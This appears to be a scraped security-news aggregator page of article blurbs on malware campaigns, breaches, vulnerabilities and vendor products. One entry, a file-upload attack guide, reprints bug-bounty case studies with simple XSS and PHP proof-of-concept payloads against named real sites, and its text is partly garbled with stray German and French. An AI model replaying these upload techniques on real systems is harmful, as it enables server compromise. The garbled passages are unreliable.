This post first appeared on blog.netwrix.com and was written by Farrah Gamboa.An Introduction to Microsoft Copilot for Security In the constantly evolving world of cybersecurity, defense teams need all the resources they can get to keep up. Fortunately, the massive advances in generative AI present SOC teams with a powerful set of tools to optimize security practices and match even fully automated adversaries using natural language … Continued

by Netwrix

Quantum computing promises breakthroughs across industries, from fraud detection to drug discovery, but businesses must prepare now to stay ahead of the curve.

by ITPro Today

Positioning security leaders as more than risk managers turns them into business enablers, trusted advisers, and, eventually, integral members of the C-suite.

by Dark Reading

Attackers post links to fake websites on LinkedIn to ask people to complete malicious CAPTCHA challenges that install malware.

by Dark Reading

Cyble researchers have discovered a new Android banking trojan that uses overlay attacks and other techniques to target more than 750 applications, including banking, finance, cryptocurrency, payment, social media, and e-commerce applications. Dubbed “TsarBot” because of the threat actor’s suspected Russian origin, the malware uses overlay attacks to steal credentials and can also record and control the screen. Other attack techniques used by the malware include lock-grabbing, keylogging, and intercepting SMS messages. Abusing Accessibility services and WebSocket communications helps the malware maintain a low profile. TsarBot Spread Through Phishing Sites TsarBot was observed spreading through a phishing site that impersonates the official Photon Sol token discovery and trading site. “The phishing site deceptively offers a download option for an application to start trading, whereas the legitimate website lacks such an option,” Cyble noted in a blog post detailing the findings. Three phishing sites deploying TsarBot were identified by the researchers, including solphoton[.]io, solphoton[.]app, and cashraven[.]online. The phishing sites deliver a dropper application that stores the TsarBot APK file, implant.apk, in the “res/raw” folder, and uses a session-based package installer to deploy the TsarBot malware on the device. After deployment, TsarBot presents a fake Google Play Service update page that prompts the user to enable Accessibility services, which establishes a socket connection with the command and control (C&C) server using ports 9001, 9002, 9004 and 9030. “By abusing Accessibility services and WebSocket communication, it enables on-device fraud while maintaining a low profile,” the Cyble researchers wrote. TsarBot Actions Include Fraud, Password Theft Cyble identified about 30 commands that TsarBot can receive from the server, primarily focused on on-screen control to carry out on-device fraud. The “REQUEST_CAPTURE” command, for example, prompts the user to enable screen capture permissions. “Once granted, the malware initiates the screen capture service, transmitting the captured screen content to the C&C server via a WebSocket connection on port 9002,” the researchers wrote. “By capturing screen content and executing server-issued screen control commands, TsarBot can carry out fraudulent transactions on the targeted device by concealing this fraud activity with a black overlay screen.” TsarBot’s LockTypeDetector feature determines the device’s lock type using the Accessibility service. “Once identified, it saves the lock type status for future use in lock-grabbing operations,” Cyble said. When TsarBot receives the “USER_PRESENT” action for the first time, it loads a fake lock screen based on the lock type and captures the user’s lock password, PIN, or pattern. Mimicking Applications TsarBot retrieves a list of targeted application package names, most of which belong to regional banking apps from countries such as France, Poland, the UK, India, the UAE, and Australia. Other package names are associated with e-commerce, social media, messaging, cryptocurrency, and other apps. TsarBot collects the installed applications on the device and compares them against the package names, “maintaining a target list for overlay attacks,” Cyble said. “The injection page mimics a legitimate application, tricking users into entering sensitive information such as net banking credentials, log in details, and credit card information,” Cyble said. “After transmitting the stolen sensitive information, TsarBot removes the targeted application’s package name from the list to prevent the overlay from being triggered again for the same app.” Cyble said the malware drives home the importance of best practices such as only downloading software from official application stores, such as the Google Play Store or the iOS App Store; using strong passwords, multi-factor authentication and biometric security; enabling Google Play Protect; and exercising caution while opening links that have been sent via SMS or emails. The full Cyble blog includes additional details, such as indicators of compromise (IoC) and MITRE ATT&CK technoques.

by The Cyber Express

Russia-linked Gamaredon targets Ukraine with a phishing campaign using troop-related lures to deploy the Remcos RAT via PowerShell downloader. Talos researchers warn that Russia-linked APT group Gamaredon (a.k.a. Armageddon, Primitive Bear, ACTINIUM, Callisto) targets Ukraine with a phishing campaign. The cyberespionage group is behind a long series of spear-phishing attacks targeting Ukrainian entities, and organizations related […]

by Security Affairs

Explore key background knowledge on authorization issues and common bad practices developers may unintentionally introduce in Salesforce Orgs. The post A Not So Comprehensive Guide to Securing Your Salesforce Organization appeared first on NetSPI.

by NetSPI

Atlantis AIO is a cybercrime-as-a-service platform that accelerates credential stuffing and account takeover attacks. This blog explores the platform and the dangers of its advanced capabilities.

by Barracuda

Security researchers from Trustwave SpiderLabs provided additional evidence backing up claims of a breach.

by Cybersecurity Dive

More than 2 in 5 leaders say they’ve strengthened practices to curb increased threats, misuse and other vulnerabilities tied to using the technology.

by Cybersecurity Dive

In this podcast, Joe, Hazel, Bill and Dave break down Talos'' Year in Review 2024 and discuss how and why cybercriminals have been leaning so heavily on attacks that are routed in stealth in simplicity.

by Cisco Talos Blog

CVE-2025-0282, a critical vulnerability that affects Ivanti’s Connect Secure, Policy Secure and ZTA Gateway products, was disclosed and patched in January.

by Cybersecurity Dive

The cloud company told customers that hackers had potentially accessed older Cerner servers, Bloomberg reports.

by ITPro Today

Navigating the Cybersecurity Highway: Mastery Through Centralised Command and Control In the fast-paced world of IT security, managing a complex infrastructure without a centralised command system is akin to navigating a densely packed highway in a high-performance sports car without a dashboard, steering, or brakes. Each component in a car – from the precision of […] The post Navigating the Cybersecurity Highway: Mastery Through Centralised Command and Control first appeared on BlockAPT.

by BlockAPT

An unsecured database used by a generative AI app revealed prompts and tens of thousands of explicit images—some of which are likely illegal. The company deleted its websites after WIRED reached out.

by WIRED Security News

Download Talos'' 2024 Year in Review now, and access key insights on the top targeted vulnerabilities of the year, network-based attacks, email threats, adversary toolsets, identity attacks, multi-factor authentication (MFA) abuse, ransomware and AI-based attacks.

by Cisco Talos Blog

Forescout’s Vedere Labs has identified 46 vulnerabilities in solar inverters—devices that convert energy from solar panels into usable electricity for the grid. These inverters, manufactured by Sungrow, Growatt, and SMA, are widely deployed in residential, industrial, and utility-scale installations. The flaws include remote code execution, insecure APIs, hardcoded credentials, IDOR (insecure direct object reference), and […] The post 46 Flaws in Solar Inverters Could Let Attackers Disrupt Entire Power Grids appeared first on ZENDATA Cybersecurity.

by Zendata

This blog investigates the network-based activity detected by Darktrace in compromises stemming from the exploitation of a vulnerability in Palo Alto Networks firewall devices, namely CVE-2024-3400.

by Darktrace

A hacker is an individual who uses computer, networking or other skills to overcome a technical problem.

by ComputerWeekly

Each Monday, the Tenable Exposure Management Academy provides the practical, real-world guidance you need to shift from vulnerability management to exposure management. In this blog, we share three challenges cybersecurity leaders say exposure management helps them solve. You can read the entire Exposure Management Academy series here.  Traditional vulnerability management is undergoing a transformation. The core cybersecurity discipline is evolving into exposure management, which is built on a broader, more strategic approach to identifying, prioritizing and mitigating risk. Modern IT environments have long been evolving beyond the on-premises data center to include cloud infrastructure, mobile devices, internet-of-things (IoT) systems and operational technology (OT). To get a close look at this shift, the Tenable Exposure Management Academy regularly interviews cybersecurity leaders around the world. Our goal is to gain insights into their real-world experiences making the shift from traditional vulnerability management to exposure management. We conduct these discussions on the condition of anonymity. This blog reveals the three key challenges they''re solving with cyber exposure management.The three challenges exposure management addressesThe leaders we spoke with want to do more than just track vulnerabilities. They want to understand and reduce real-world cyber risk across their expanding attack surfaces. Exposure management empowers them to tackle these three challenges:1. Lack of attack surface visibilityFor effective risk management, the leaders we spoke with are seeking a complete, unified view of all assets and their associated threat exposures across diverse environments. Visibility is essential because security teams can’t protect what they can’t see. In our discussion, a security leader working at a distributor noted that many organizations struggle with asset ownership and accountability in expansive environments. ""Sometimes, if you have a vulnerability happening, you just need to know who owns it,” the leader pointed out. “But no matter who owns it, we need to track it. We didn’t have a lot of visibility on that and we needed to know in order to effectively manage vulnerabilities.”Security exposure management provides visibility beyond traditional siloed IT assets, including:Cloud environments (including public, private, multi-cloud and hybrid) Mobile and remote endpoints Containers and microservices OT and industrial control systems Third-party and supply-chain integrationsThe key: With the right exposure management strategy, you can consolidate and standardize security data from multiple tools and environments, ensuring every detail is correct (including asset ownership), while reducing blind spots and improving response times.2. Difficulty prioritizing remediation An important point to remember: Not all vulnerabilities pose the same level of risk. But determining how much risk any vulnerability presents requires context specific to your environment. You need to understand who or what has access to that asset, their privileges and how critical the asset is to business functions. Traditional vulnerability management can’t help you connect these dots for effective risk prioritization. When your security teams are overwhelmed by thousands of potential issues, they can’t effectively guide their IT counterparts tasked with remediation.Exposure management in cybersecurity provides the additional context needed to practice risk-based vulnerability management, focusing remediation on the vulnerabilities with greatest potential impact in your unique environment.Exposure management helps you understand whether bad actors are actively using a vulnerability in attacks (we call this “exploitability”), how important the affected system is to your organization (we call this “asset criticality rating”) and how an attacker could exploit a vulnerability in real-world scenarios (also known as “potential attack pathways”).As a security leader for an industrial real estate firm explained, the challenge is not just fixing vulnerabilities but also measuring security progress in a meaningful way. ""We''re trying to move to a risk-type of reporting instead of ‘You fixed a thousand exposures,’” this security leader told us. “Say you have 10,000 exposures and the team knocks out 2,000 in a month. But Microsoft releases 3,000 more. Now you have 11,000. What did you actually accomplish? We have to shift to a risk approach.""The key: Risk-based exposure management ensures security teams focus on what matters most, rather than being buried under an ever-growing vulnerability backlog.3. Staying stuck in reactive modeExposure management introduces a new way of thinking about cybersecurity. Instead of staying in reactive mode, responding to each new incident as it arises, continuous exposure management enables your teams to practice proactive security. You can anticipate potential attack scenarios and implement security controls to mitigate threats before attackers exploit them.What does proactive cybersecurity look like? Here are three requirements:Attack path analysis to identify potential ways attackers could move laterally through your networkAutomated threat modeling to simulate potential breach scenariosPre-emptive security controls such as segmentation, access restrictions and zero-trust architecturesOne leader emphasized an important point: Cyber risk requires a shift in mindset and organizational culture.""We’re quite reactive,” the security leader said. “And because we’ve been very manual, we needed a tool to help us get to the next stage. That means more automation to ease our workload so we can focus on more value-added work — like educating stakeholders to prevent repeat mistakes.""The key: By embedding best practices for cyber exposure management into daily operations, you can minimize risk before attackers can take advantage of vulnerabilities.TakeawaysMaking the shift and practicing exposure management vs vulnerability management reflects a broader evolution in cybersecurity that aims to move from reactive security posture management to proactive risk management. Leaders are tackling the three key challenges — lack of attack surface visibility, difficulty prioritizing remediation and staying stuck in reactive mode — by embracing exposure management to build a more resilient security posture that aligns with business priorities. 

by Tenable

The internet is so filled with falsehoods that April Fools hits different these days. That''s why, as a cybersecurity company, we''re out.

by Malwarebytes Labs

A list of topics we covered in the week of March 24 to March 30 of 2025

by Malwarebytes Labs

Bishop Fox's, Alethe Denis, recaps and provides key insights from her talk, Epic Fails and Heist Tales: Red Teaming Toward Truly Tested Security, at Wild West Hackin' Fest.

by Bishop Fox

On World Backup Day, experts urge organizations to safeguard their data from loss, cyberattacks, and costly downtime.

by ITPro Today

Welcome to the Threat Context Monthly blog series where we provide a comprehensive roundup of the most relevant cybersecurity news and threat information from KrakenLabs, Outpost24’s cyber threat intelligence team. Here’s what you need to know from March about espionage activities by threat actors Green Nailao and UNC3886. Spotlight threat: Green Nailao – Growing links […] The post Threat Context Monthly: Green Nailao & UNC3886 – Briefing for March 2025   appeared first on Outpost24.

by Outpost24

In an address to Congress this month, President Trump claimed he had ""brought free speech back to America."" But barely two months into his second term, the president has waged an unprecedented attack on the First Amendment rights of journalists, students, universities, government workers, lawyers and judges. This story explores a slew of recent actions by the Trump administration that threaten to undermine all five pillars of the First Amendment to the U.S. Constitution, which guarantees freedoms concerning speech, religion, the media, the right to assembly, and the right to petition the government and seek redress for wrongs.

by Krebs on Security

Key Takeaways Case Summary This case from May 2024 started with a malicious download from a website mimicking the teleconferencing application Zoom. When visiting the website and downloading a file … Read More

by The DFIR Report

by CrowdStrike

Last weekend, Jeffrey Goldberg, editor-in-chief of The Atlantic, found himself at the center of a digital fiasco when he was unexpectedly added to a Signal group chat with 17 U.S. government officials who were discussing imminent airstrikes in Yemen. For some, the incident has raised questions about how phone numbers end up in contact lists […]

by TechCrunch

Kingston''s IronKey is one of the most secure USBs you can buy, from a military-standardized build to a complex passphrase mode.

by ZDNET Security

By [Alon Gal] | March 2025 Another colossal breach fueled by infostealer malware, and this time, it’s Samsung in the crosshairs. A hacker going by the alias “GHNA” has dumped a staggering 270,000 customer tickets from Samsung Germany online, completely free of charge. The data, which appears to be sourced from samsung-shop.spectos.com, didn’t come from some […] The post Samsung Tickets Data Leak: Infostealers Strike Again in Massive Free Dump appeared first on InfoStealers.

by InfoStealers

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has shed light on a new malware called RESURGE that has been deployed as part of exploitation activity targeting a now-patched security flaw in Ivanti Connect Secure (ICS) appliances. ""RESURGE contains capabilities of the SPAWNCHIMERA malware variant, including surviving reboots; however, RESURGE contains distinctive commands that

by The Hacker News

Introduction File upload features work as standard elements in contemporary web programs by providing users with an interface for image and document uploads along with other content sharing abilities. The feature remains at extreme risk of attack if the developers fail to establish sufficient security protocols for it. Insecure file upload mechanisms enable attackers to cause serious breaches when they execute cross-site scripting (XSS) and perform remote code execution (RCE) allowing attackers to gain complete access to remote servers. This blog explains the predominant attack pathways utilised by attackers and their thought processes along with business security threats plus applicable safety measures developers and their security teams need to implement for system protection. 🛠️ Common File Upload Attack Vectors 1. Unrestricted File Types **Risk: Allow executable file types (e.g., .php, .jsp, .html) and the attackers can upload malicious scripts. Example: An image of a .php file can be executed on the server for arbitrary code. Defense: Personen eine harde whitelist (z.B. nur .png, .jpg, .pdf) implementieren. 2. Insecure Validation Logic Bypass Techniques: Header Spoofing: Modyfing untrusted Content-Type headers (i.e. identified .php file as image/png). Magic Bytes Spoofing: Adding valid file signatures (e.g., GIF89a) to malicious files. Defense: Validate both file extensions and content (e.g., check magic bytes). 3. Storage Misconfigurations **Prospective risks: (Inocuous error) Storing uploads in web-accessible directories lets user execute malicious scripts. Exploit: A .php file loaded to /uploads can be reached by https://example.com/uploads/attack.php. Defense: Payer marché, Met de fichiers sur CDNs, Configurer les Rigt dans les permissions. 4. Insecure File Metadata Handling Threats: Known viruses and Trojans, E-Mail spoofing, Real random threats by STRIPMIX Products. Defense: Clean filenames, remove metadata, re-name files (e.g., use UUID). 🔍 Case Study Breakdowns Case Study1: Case of the Unrestricted Uploads: How a Hunter Transformed a Simple File Upload into XSS Goldmine on Uber Eats Introduction Picture turning on a restaurant menu for a weapon. Exactly this hunt4p1z2za exploited a stored cross-site scripting (XSS) bug in Uber Eats that could have been catastrophic—all without getting a disclosed bounty for it (at least not yet). The flaw? An unrestricted file upload within restaurant onboarding where attackers could sneak in HTML and SVG files causing malicious scripts to run upon every menu view. The Hunter’s Approach Hunt4p1zza (via Rephrase) probably started conducting reconnaissance, checking out Uber Eats restaurant signup functionality with https://www.ubereats.com/restaurant/en-CA/signup. Tools such as Burp Suite probably entered the picture, deconstructing request the file upload mechanism. Their mindset? Test the edges—onboarding is usually feature that users return to but generally not audited as much as customer-facing features, creating areas where mistakes were made. How the Bug Was Found The bounty hunter might have undergone some steps like the following: Went to restaurant sign-up page. Saw the menu upload feature in the onboarding. Used it with pictures, PDFs, then html and svg files. Saw uploaded file rendered in-browser as Content-Disposition: inline. Uploaded crafted HTML file which hosted JavaScript payload(i.e,<script>alert(''XSS'')</script). Scanned the menu and seen script executed to confirm it was stored XSS. The standout moment? Understanding the inline render formed a simple upload deploy into a persistence the attack … Why They Looked There File uploads are the bug hunter’s delight especially in onboarding flows. These areas usually focus on the functionality over security Firstly rush to onboard the restaurants. Hunt4p1zza probably suspected that the path of Uber Eats went down a less-traveled route and placed a big gamble on skipping robust validation. Chained Bugs or Complexity No complex chain involved. The unrestricted upload and in-line rendering were the decisive factors. Why It Matters Stored XSS on Uber Eats would have allowed attackers to steal customers’ data, take over their accounts or distribute malware – every menu view a risk. Given millions of users, the degree of this blunder means that this is an exceptional find, revealing that even goliaths can fail to focus on the essentials. Mitigation Suggestions Whitelist allowed file types (e.g., PDF, JPG) and reject everything else. Validate file contents with magic numbers, not just extensions. Sanitize rendered content to strip executable code. Switch to Content-Disposition: attachment to stop inline rendering. Links and Resources Original Report OWASP File Upload Cheat Sheet Burp Suite Case Study 2: Profile Pic to RCE: How a Hunter Exploited MTN’s Career Site for Just One Upload Introduction This hunter pwned a critical remote code execution (RCE) on MTN careers webapp, bounty premie not specified, impace immense. The bug? An unvalidated file upload that enabled PHP uploaded as profile pictures, to be runtime-executable on demand. The Hunter’s Approach Imagine this : The hunter browses to https://careers.mtn.cm, logs and lands on the profile update section . By employing proxy tools similar to Burp Suite, they probably caught upload requests, seeking vulnerabilities. Their strategy? Stretch the upload feature’s capabilities, since a carreer site–much less visited than MTN’s top pages–may get away without security. How the Bug Was Found The steps were simple but excellent: Signed up at https://careers.mtn.cm. Logged in and on profile update page. Uploaded a PHP file (like <?php phpinfo(); ?>) as a profile picture. I then checked page source and found location of file to the target file (ie. https://careers.mtn.cm/en/user/images/users/-13-04-2021-20-15-16-payload.php). In the address bar I flipped the path in and—. The creative twist? Obtaining the file’s accessible URL in the source, making an upload simple into a server takeover. Why They Looked There Profile pic uploads are always on target—user vibes usually skate free of tight-lid reviews. An economy-focussed site, honing in on candidates over their core services, may have been a strategic move with less to lose. Chained Bugs or Complexity No chaining necessary –the no- validation and direct file access gave RCE with no strings attached. Why It Matters RCE is the holy grail of vulnerabilities, providing the attacker the access to the server without any barrier. On MTN’s careers website, this could be an unauthorized access to confidential data, defacement of website, or it could be a launch pad to internal systems – an alerting sign for a telecom giant. Mitigation Suggestions Limit uploads to images (JPG, PNG) via strict type checks. Verify file contents with magic numbers, not extensions. Store files outside the web root or block direct access. Add server-side validation to reject executable files. Links and Resources Original Report OWASP Unrestricted File Upload File Upload Security Best Practices Case Studey 3: Brewing Trouble: How a Hunter Found RCE on Starbucks’ Mobile Site Bounty Writeup : http://www.kamilonurozkaleli.com/posts/rce-on-starbucks-singapore-and-more/ Bounty Payout : $5600 Introduction Coffee break progressed into security disaster when ko2sec stumbled upon an alleged RCE on Starbucks mobile site—no bounties revealed, but the potential losses were too horrible to contemplate. The culprit? An Anonymous .ashx endpoint on mobile.starbucks.com.sg which accepted files with no restrictions, resulting in server compromise. The Hunter’s Approach Ko2sec probably began with recon— resemble a subdomain enum or directory brute-forcing using tools like as Gobuster or ffuf to locate the .ashx endpoint. Once seen, they tried it on with a load of different file types, assuming that a mobile site might take a bit of a security back seat to the top end sites security. Recon https://github.com/irsdl/iis-shortname-scanner/tree/master/ The above tools was used for blind discovery of ‘IIS’ servers on the specified endpoint. How the Bug Was Found Here’s the probable play-by-play: Found the .ashx endpoint from a recon on mobile.starbucks.com.sg. Uploaded several files—images, then scripts—to see how files were being restricted. Verified the server accepted executable file formats. Extended hunt to find similar vulnerabilities on Starbucks out-of-scope domains. Why They Looked There ASHX handlers play to an specific request and can be the gold granny if misconfigured. A mobile site – a lower priority- might have misdirected ko2sec to less control – thinking that would pay off. Chained Bugs or Complexity The report suggests possible RCE but doesn’t show that it is executed. Nonetheless the unrestricted upload is a bad sign and ko2sec’s multi domain sweep is seriously talented. Why It Matters RCE on Starbucks mobile site could expose customer data, bring down services or even worse. Identifying the same problem in multiple domains raises this to a systemic issue – a high impact catch. Mitigation Suggestions Lock down uploads to image-only with strict validation. Secure .ashx endpoints against code injection. Audit all endpoints, mobile or not, for consistency. Cross-check domains for shared vulnerabilities. Links and Resources Original Report ASHX Handler Security Gobuster Tool 🧠 Lessons Learned and Best Practices Multiple precautions need to be implemented for protection against file upload attacks. Two actionable strategies and lessons exist for maintaining these features as follows: Validation Defense Checklist Users should be able to upload files only from approved types such as .png and .jpg because of application requirements while blocking all other file formats. Three-tiered validation procedures should be used to check the file extension and MIME type and magic byte signatures thereby maintaining a consistent and authentic file state. The system should apply unique UUIDs to newly uploaded files to stop attacks by maintaining random file names upon upload. Directories in which files should be stored must remain outside the web root both in non-executable locations or with limited access to secure cloud storage tools. Sanitization of metadata should remove all hidden exploits and information leakage elements. The administration needs to conduct frequent assessments of upload methods so defenses can be updated against new security risks. Automate Security Testing Tools to Use: Burp Suite functions as a manual tool to intercept upload requests for vulnerability identification purposes. Owasp Zap Nessus Techniques: Security checks need to be built into the CI/CD pipelines to detect threats before deployments. The organization should perform penetration tests regularly to assess hacker tactics while identifying vulnerabilities. A comprehensive set of defense strategies enabled through these practices and tools develops a secure system that lowers vulnerability exposure to attacks and strengthens application security. Conclusion The defense of secure file uploads must include three fundamental measures which involve strict validation protocols and secure storage systems and real-time monitoring systems. Organizations which adopt thorough knowledge of attacker tactics combined with strong defense protocols prevent their vulnerabilities from turning into extensive breaches. The single mistake of misconfiguring an upload feature enables attackers to breach systems leading to catastrophic damage. The presence of potential threats demands avoidance of assumptions and constant testing along with strict alertness towards file upload safety.

by HACKLIDO

Cybersecurity researchers have discovered a new Android banking malware called Crocodilus that''s primarily designed to target users in Spain and Turkey. ""Crocodilus enters the scene not as a simple clone, but as a fully-fledged threat from the outset, equipped with modern techniques such as remote control, black screen overlays, and advanced data harvesting via accessibility logging,""

by The Hacker News

Plus: Alleged Snowflake hacker will be extradited to US, internet restrictions create an information vacuum in Myanmar, and London gets its first permanent face recognition cameras.

by WIRED Security News

In what''s an instance of hacking the hackers, threat hunters have managed to infiltrate the online infrastructure associated with a ransomware group called BlackLock, uncovering crucial information about their modus operandi in the process. Resecurity said it identified a security vulnerability in the data leak site (DLS) operated by the e-crime group that made it possible to extract

by The Hacker News

XWiki Standard 14.10 - Remote Code Execution (RCE)

by Exploit DB

Solstice Pod 6.2 - API Session Key Extraction via API Endpoint

by Exploit DB

The General Services Administration is planning to use automation to speed up the process of determining which cloud services federal agencies are allowed to buy.

by Dark Reading

Based on the open source NGINX Web server, the malicious tool allows threat actors to steal user credentials and session tokens.

by Dark Reading

Cybersecurity researchers have disclosed 46 new security flaws in products from three solar power system vendors, Sungrow, Growatt, and SMA, that could be exploited by a bad actor to seize control of devices or execute code remotely, posing severe risks to electrical grids.  The vulnerabilities have been collectively codenamed SUN:DOWN by Forescout Vedere Labs. ""The new vulnerabilities can

by The Hacker News

Evidence suggests an attacker gained access to the company''s cloud infrastructure environment, but Oracle insists that didn''t happen.

by Dark Reading

In the past year alone, the number of artificial intelligence (AI) packages running in workloads grew by almost 500%. Which... The post 5 Steps to Securing AI Workloads appeared first on Sysdig.

by Sysdig

by Dark Reading

This blog delves into Darktrace’s investigation into the exploitation of the Citrix Bleed vulnerability on the network of a customer in late 2023. Darktrace’s Self-Learning AI ensured the customer was well equipped to track the post-compromise activity and identify affected devices.

by Darktrace

This blog examines a network compromise that stemmed from the purchase of leaked credentials from the dark web. Credentials purchased from dark web marketplaces allow unauthorized access to internal systems. Such access can be used to exfiltrate data, disrupt operations, or deploy malware.

by Darktrace

Vendors are scrambling to compare MTTD metrics laid out in the latest MITRE Engenuity ATT&CK® Evaluations. But this analysis is reductive, ignoring the fact that in cybersecurity, there are far more metrics that matter.

by Darktrace

Darktrace/Email detected a phishing attack that had originated from LinkedIn, where the attacker impersonated a well known construction company to conduct a credential harvesting attack on the target. Darktrace’s ActiveAI Security Platform played a critical role in investigating the activity and initiating real-time responses that were outside the physical capability of human security teams.

by Darktrace

Darktrace continues to innovate with Microsoft in the shared mission to deliver proactive cyber protection tailored to every organization. Joint customers benefit from two distinct, complementary security approaches – combining large scale threat intelligence with enterprise-native security insights – to address the full range of email threats.

by Darktrace

Explore Darktrace''s innovative methods for detecting NTLM hash theft and safeguarding your organization from cyber threats.

by Darktrace

by Dark Reading

Find out how to safeguard your organization from the Jupyter information stealer with strategies revealed by Darktrace''s in-depth investigation.

by Darktrace

Part 4: This blog explores the findings from Darktrace’s State of AI Cybersecurity Report on security professionals'' understanding of the different types of AI used in security programs. Get the latest insights into the evolving challenges, growing demand for skilled professionals, and the need for integrated security solutions by downloading the full report.

by Darktrace

Discover effective strategies for disarming the WarmCookie backdoor and securing your systems against this persistent threat.

by Darktrace

Darktrace observed the rapid exploitation of a critical vulnerability in JetBrains TeamCity (CVE-2024-27198) shortly following its public disclosure. Learn how the need for speedy detection serves to protect against supply chain attacks.

by Darktrace

In May 2024, a Darktrace customer was affected by KOK08, a ransomware strain commonly used by the Matrix ransomware family. Learn more about the tactics used by this ransomware case, including double extortion, and how Darktrace is able to detect and respond to such threats.

by Darktrace

Read about the methods used to exploit FortiClient EMS and the critical post-exploitation tactics that affect cybersecurity defenses.

by Darktrace

Discover how thread hijacking led to a SaaS compromise on a Darktrace customer network, revealing the attacker’s tactics to infiltrate trusted conversations and potentially steal sensitive credentials. Learn about Darktrace’s autonomous detection and response actions that blocked and prevented the attack from escalating.

by Darktrace

Android-based malware like Triada is increasingly targeting banking and communication apps to steal sensitive data. Triada uses sophisticated methods to evade detection, exfiltrating data to C2 servers via algorithmically generated hostnames. This underscores the need for advanced security measures to protect against these evolving threats and safeguard user data.

by Darktrace

In a recent incident, Darktrace uncovered a M365 account takeover attempt targeting a company in the manufacturing industry. The attacker executed a sophisticated phishing attack, gaining access through the organization’s SaaS platform. This allowed the threat actor to create a new inbox rule, potentially setting the stage for future compromises.

by Darktrace

This blog explores recent findings from Darktrace''s Threat Research team on active exploitation campaigns targeting Fortinet appliances. This analysis focuses on the September 2024 exploitation of FortiManager via CVE-2024-47575, alongside related malicious activity observed in June 2024.

by Darktrace

This blog provides an in-depth overview of NERC CIP-015 compliance requirements, focusing on the importance of internal network security monitoring (INSM) for electric utilities. Learn about the NERC CIP-015 standards adopting internal network security monitoring (INSM) solutions with Darktrace.

by Darktrace

Spanish-language naming conventions complicate identity mapping for spoofing & especially whale-spoofing detection. Darktrace / EMAIL incorporates parsing logic that allows for faithful spoofing detection in conjunction with anomaly detection.

by Darktrace

Delve into the complexities of the Royal and Blacksuit ransomware strains and their implications for cybersecurity in today’s digital landscape.

by Darktrace

A recent phishing attack compromised an internal email account, but Darktrace’s advanced AI quickly intervened. By identifying unusual activity across email and SaaS environments, Darktrace uncovered the attacker’s use of VPNs to mask their location and shut down the threat.

by Darktrace

This blog highlights how Darktrace / CLOUD leverages self-learning AI to tackle critical cloud security challenges—such as misconfigurations, hybrid environment complexity, securing productivity suites, and agent fatigue—by providing unified visibility, intelligent monitoring, and real-time threat response to empower organizations with proactive protection.

by Darktrace

Cybersecurity researchers are calling attention to a new sophisticated malware called CoffeeLoader that''s designed to download and execute secondary payloads. The malware, according to Zscaler ThreatLabz, shares behavioral similarities with another known malware loader known as SmokeLoader.  ""The purpose of the malware is to download and execute second-stage payloads while evading

by The Hacker News

by Dark Reading

The attack hit the Kuala Lumpur airport over the weekend, and it remains unclear who the threat actors are and what kind of information they may have stolen.

by Dark Reading

by Dark Reading

A vulnerability has been found that can be exploited through every browser as long as its running on a Windows system

by Malwarebytes Labs

Darktrace / CLOUD combines with Cado’s automated forensics capture to achieve rapid containment and deep investigative capabilities. Learn more about accelerating MTTR here.

by Darktrace

A recent report by McAfee disclosed a new Android malware campaign leveraging the .NET MAUI cross-platform framework to evade detection. The post Zimperium’s Zero-Day Detection of Android Malware Using .NET MAUI Framework appeared first on Zimperium.

by Zimperium

In January 2025, Ivanti disclosed two critical vulnerabilities affecting their products. Darktrace detected exploitation of these vulnerabilities as early as December 2024.

by Darktrace

Part 2/4: Darktrace releases insights on the State of AI in cybersecurity. This blog discusses AI’s impact on the cyber threat landscape.

by Darktrace

Part 4/4: Darktrace shared new insights in the annual State of AI Cybersecurity report. This blog explores its findings on defenders’ priorities and objectives going into 2025. Discover the latest trends of major obstacles and the plans to overcome them by downloading the full report.

by Darktrace

In late 2024, Darktrace detected unusual activity linked to Cyberhaven''s Chrome browser extension. Read more about Darktrace’s investigation here.

by Darktrace

Darktrace is proud to announce we’ve been the only Visionary in the inaugural Gartner® Magic Quadrant™ for Cyber-Physical Systems (CPS) Protection Platforms. Read the blog to find out why!

by Darktrace

Despite the stealthy nature of spyware, security researchers keep detecting Pegasus spyware attacks in part because of sloppy ''operational security.''

by TechCrunch

Long gone are the days when a simple backup in a data center was enough to keep a business secure. While backups store information, they do not guarantee business continuity during a crisis. With IT disasters far too common and downtime burning through budgets, modern IT environments require solutions that go beyond storage and enable instant recovery to minimize downtime and data loss. This is

by The Hacker News

Mac VPNs are privacy tools to enhance your online privacy and security. These are our top VPN recommendations for Mac users who want to hide their activities.

by ZDNET Security

Microsoft''s new sign-in screens push you to finally ditch passwords - here''s how.

by ZDNET Security

Digital transformation has revolutionized industries with critical infrastructure — but it has also introduced new vulnerabilities.

by Dark Reading

Google''s trusty casting device has been around for over a decade, and while its days are numbered, it still does more than just stream your favorite shows.

by ZDNET Security

Application security flaws classified as broken access control weaknesses are the most impactful risk category in the OWASP Top 10. This article shows how attackers can exploit access control gaps, lists high-profile data breaches caused by such attacks, and gives best practices for preventing and mitigating broken access control vulnerabilities. The post Broken access control: The leading OWASP Top 10 security risk appeared first on Invicti.

by Invicti

An Android malware family previously observed targeting Indian military personnel has been linked to a new campaign likely aimed at users in Taiwan under the guise of chat apps. ""PJobRAT can steal SMS messages, phone contacts, device and app information, documents, and media files from infected Android devices,"" Sophos security researcher Pankaj Kohli said in a Thursday analysis. PJobRAT, first

by The Hacker News

Behold a perverse system where employers come to value those who can manipulate their hiring tech.

by ITPro Today

Web Application Penetration Testing (WAPT) is a methodical approach to security that involves ethical hackers simulating real-world cyber-attacks on your web application to uncover vulnerabilities. By mimicking the tactics of cybercriminals, these professionals can identify weaknesses before malicious actors can exploit them. This proactive process allows businesses to address security flaws early and maintain a […] The post Top 5 Web Application Penetration Testing Companies UK appeared first on IT Security Guru.

by IT Security Guru

This post first appeared on blog.netwrix.com and was written by Jonathan Blackwell.Introduction to PowerShell 7 PowerShell 7 is a modern, cross-platform (Windows, macOS, and Linux) automation and configuration management tool that builds on the features of Windows PowerShell. It is based on the .NET Core runtime, unlike previous versions of PowerShell that relied on the Windows-only .NET Framework. This shift has allowed for significant improvements in … Continued

by Netwrix

Cryptocurrency will be more popular in 2025 than it has ever been and this means that there is a greater need for wallet security. As the crypto sector becomes more profitable and popular, malicious actors will look to exploit investors and steal their funds through methods like phishing schemes, wallet hacks, and so on. Then […] The post 4 Tips For Crypto Wallet Security appeared first on IT Security Guru.

by IT Security Guru

